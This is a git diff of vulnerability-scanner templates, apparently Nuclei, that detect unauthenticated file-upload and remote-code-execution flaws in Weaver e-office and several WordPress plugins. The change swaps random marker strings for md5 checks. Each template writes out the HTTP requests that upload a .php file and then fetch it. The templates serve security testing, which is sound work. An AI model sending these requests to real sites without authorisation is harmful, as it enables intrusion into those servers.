+++ b/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml
@@ -14,7 +14,7 @@ info:
tags: weaver,e-office,intrusive,rce,file-upload
variables:
filename: "{{to_lower(rand_base(5))}}"
- string: "{{randstr}}"
+ string: "weaver-lazyuploadify-file-upload"
http:
- raw:
@@ -33,7 +33,7 @@ http:
Content-Disposition: form-data; name="Filedata"; filename="{{filename}}.php"
Content-Type: application/octet-stream
-
+
------WebKitFormBoundaryjetvpuye--
- |
GET /attachment/{{attachmentID}}/{{attachmentName}} HTTP/1.1
@@ -58,8 +58,11 @@ http:
matchers:
- type: dsl
dsl:
- - "status_code_1 == 200"
- "contains(body_2, 'attachmentID') && contains(body_2, 'attachmentName')"
- - "status_code_3 == 200 && contains(body_3,'{{randstr}}')"
condition: and
+
+ - type: word
+ part: body_3
+ words:
+ - '{{md5(string)}}'
# digest: 4b0a00483046022100b1ecbee09f268b25db456fc80be7fb4e0436700a30c52c333959bad8e6396eaa022100ecdc3c2a0b7b463361a617fa59de8766cc175aa00c02f53aab647db22bf0b837:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml b/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml
index d3ff23d34f..e829492050 100755
--- a/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml
@@ -15,6 +15,7 @@ info:
tags: weaver,e-office,oa,rce,intrusive,fileupload
variables:
filename: "{{to_lower(rand_base(5))}}"
+ string: "weaver-office-server-file-upload"
http:
- raw:
@@ -30,7 +31,7 @@ http:
Content-Disposition: form-data;name="FileData";filename="{{filename}}.php"
Content-Type: application/octet-stream
- '
+
------WebKitFormBoundaryLpoiBFy4ANA8daew
Content-Disposition: form-data;name="FormData"
@@ -46,7 +47,7 @@ http:
- type: word
part: body_2
words:
- - "758058d8987e7a9ec723bcdbec6c407e"
+ - '{{md5(string)}}'
- type: status
status:
diff --git a/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml b/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml
index d45c97663a..aecbefe3ce 100755
--- a/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml
@@ -11,10 +11,11 @@ info:
verified: true
max-request: 3
fofa-query: app="泛微-EOffice"
- tags: weaver,e-office,oa,instrusive,rce,intrusive
+ tags: weaver,e-office,oa,intrusive,rce,intrusive,fileupload
+
variables:
filename: "{{to_lower(rand_base(5))}}"
- string: "{{randstr}}"
+ string: "weaver-uploadify-file-upload"
http:
- raw:
@@ -33,7 +34,7 @@ http:
Content-Disposition: form-data; name="Filedata"; filename="{{filename}}.php"
Content-Type: application/octet-stream
-
+
------WebKitFormBoundaryjetvpuye--
- |
GET /attachment/personal/_temp.php HTTP/1.1
@@ -43,8 +44,11 @@ http:
matchers:
- type: dsl
dsl:
- - "status_code_1 == 200"
- "contains(body_2, 'imageSrc') && contains(body_2, 'height')"
- - "status_code_3 == 200 && contains(body_3,'{{randstr}}')"
condition: and
+
+ - type: word
+ part: body_3
+ words:
+ - '{{md5(string)}}'
# digest: 4b0a00483046022100b9ada8f5c9c7c9375352c42246f9fb09f686f69dd499c02fe7b5ebb77c3d48d9022100e417a1341b83b7240f1c5a0bf814d5b9931112064dc0317b19fd6f0e2647a6c6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml b/http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml
index b55e8d7816..b5f0e2839e 100644
--- a/http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml
+++ b/http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml
@@ -19,6 +19,9 @@ info:
max-request: 2
tags: wpscan,edb,wordpress,wp,wp-plugin,fileupload,intrusive,3dprint
+variables:
+ string: "3dprint-arbitrary-file-upload"
+
http:
- raw:
- |
@@ -35,18 +38,16 @@ http:
Content-Disposition: form-data; name="file"; filename={{randstr}}.php
Content-Type: text/php
-
+
-----------------------------54331109111293931601238262353--
- |
GET /wp-content/uploads/p3d/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- - type: dsl
- dsl:
- - 'contains(header_2, "text/html")'
- - "status_code_2 == 200"
- - "contains(body_2, '3DPrint-arbitrary-file-upload')"
- condition: and
+ - type: word
+ part: body_2
+ words:
+ - '{{md5(string)}}'
# digest: 490a0046304402204014e03adf59b73d5219aa2cf87a8a95ae9a277a296473ccbfb68c7d86e10fce022023c5fa1f1eee7bce47ce0038c7bb17f30859773a2017a1db43e095fb48f8a3d0:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml b/http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml
index 5e3e29dfe7..f32849cbf2 100644
--- a/http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml
+++ b/http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml
@@ -17,6 +17,9 @@ info:
max-request: 2
tags: wp-plugin,rce,fileupload,unauth,wpscan,msf,wordpress,ait-csv,wp,intrusive
+variables:
+ string: "ait-csv-import-export-rce"
+
http:
- raw:
- |
@@ -29,7 +32,7 @@ http:
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
Content-Type: application/octet-stream
- sep=;
+ sep=;
--------------------------ab360007dbae2de8--
- |
@@ -39,12 +42,8 @@ http:
matchers-condition: and
matchers:
- type: word
- part: body
+ part: body_2
words:
- - "fe394b60dc324c3bac3060d600ad4349"
-
- - type: status
- status:
- - 200
+ - '{{md5(string)}}'
# digest: 490a004630440220644f99faec006ef48de167e6e9a5c70b704d0a180dfac6ac88341eb2dcecc7780220396204420fb32c1f832b3e122af2ba85db50e034b7ffbb70e1dee8fb7752a18f:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml b/http/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml
index 1628c63cf5..ad31b680f3 100644
--- a/http/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml
+++ b/http/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml
@@ -15,8 +15,10 @@ info:
metadata:
max-request: 3
tags: wp,wpscan,wordpress,wp-plugin,rce,intrusive,fileupload
+
variables:
filepath: '{{rand_base(7, "abcdefghi")}}'
+ string: "wordpress-rce-simplefilelist"
http:
- raw:
@@ -46,7 +48,7 @@ http:
Content-Disposition: form-data; name="file"; filename="{{filepath}}.png"
Content-Type: image/png
-
+
--6985fa39c0698d07f6d418b37388e1b2--
- |
POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1
@@ -63,12 +65,9 @@ http:
matchers-condition: and
matchers:
- type: word
- part: body
+ part: body_3
words:
- - "aa5be3e9dec96f2f1a593b2f5b2288af"
- - "PHP Version"
- - "Configuration Command"
- condition: and
+ - '{{md5(string)}}'
- type: status
status:
diff --git a/http/vulnerabilities/wordpress/wp-kadence-blocks-rce.yaml b/http/vulnerabilities/wordpress/wp-kadence-blocks-rce.yaml
index ad34959adf..9fc48b1972 100644
--- a/http/vulnerabilities/wordpress/wp-kadence-blocks-rce.yaml
+++ b/http/vulnerabilities/wordpress/wp-kadence-blocks-rce.yaml
@@ -14,11 +14,13 @@ info:
verified: true
max-request: 2
publicwww-query: "/wp-content/plugins/kadence-blocks/"
- tags: rce,wpscan,wordpress,wp-plugin,wp,kadence-blocks,file-upload,intrusive
+ tags: rce,wpscan,wordpress,wp-plugin,wp,kadence-blocks,fileupload,intrusive
+
variables:
str: "{{to_lower(rand_text_alpha(5))}}"
email: "{{rand_base(8)}}@{{rand_base(5)}}.com"
filename: "{{to_lower(rand_text_alpha(5))}}"
+ string: "wp-kadence-blocks-rce"
http:
- raw:
@@ -48,7 +50,7 @@ http:
GIF89a
-
+
-----------------------------8779924633391890046425977712
Content-Disposition: form-data; name="_kb_adv_form_post_id"